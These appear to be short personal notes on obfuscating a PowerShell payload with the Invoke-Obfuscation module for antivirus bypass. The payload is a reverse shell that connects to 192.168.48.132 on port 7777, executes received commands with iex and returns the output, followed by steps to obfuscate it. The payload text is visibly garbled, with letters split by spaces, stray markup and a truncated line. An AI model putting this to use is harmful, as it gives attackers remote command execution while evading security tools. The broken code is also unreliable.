Obfuscation

sudo apt install powershell

Then download the Invoke-Obfuscation module
git clone https://github.com/danielbohannon/Invoke-Obfuscation.git

go to the folder and start powershell: pwsh

Then import this module:

Invoke-Obfuscation

Then we need a powershell payload to obfuscate and save it as shell.ps1:

$c l i e n t = N e w - O b j e c t S y s t e m . N e t . S o c k e t s . T C P C l i e n t (^{'} 192.168 .48 {.132}^{'}, 7777);$ stream = $c l i e n t . G e t S t r e a m (); [b y t e []]$ bytes = 0..65535|%{0};while(($i = $s t r e a m . R e a d ($ bytes, 0, $bytes.Length)) -ne 0){;$ data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$ sendback = (iex $data 2>&1 | Out-String );$ sendback2 = $s e n d b a c k +^{'} P S^{'} + (p w d) . P a t h +^{'} >^{'};$ sendbyte = ASCII).GetBytes( $s e n d b a c k 2);$ stream.Write( $s e n d b y t e, 0,$ sendbyte.Length); $stream.Flush()};$ client.Close(

Then use this command with the path for the script:

SET SCRIPTPATH /home/asem/AVBypass/shell.ps1

One of the options is to use: AST then ALL then u will see the Obfuscated script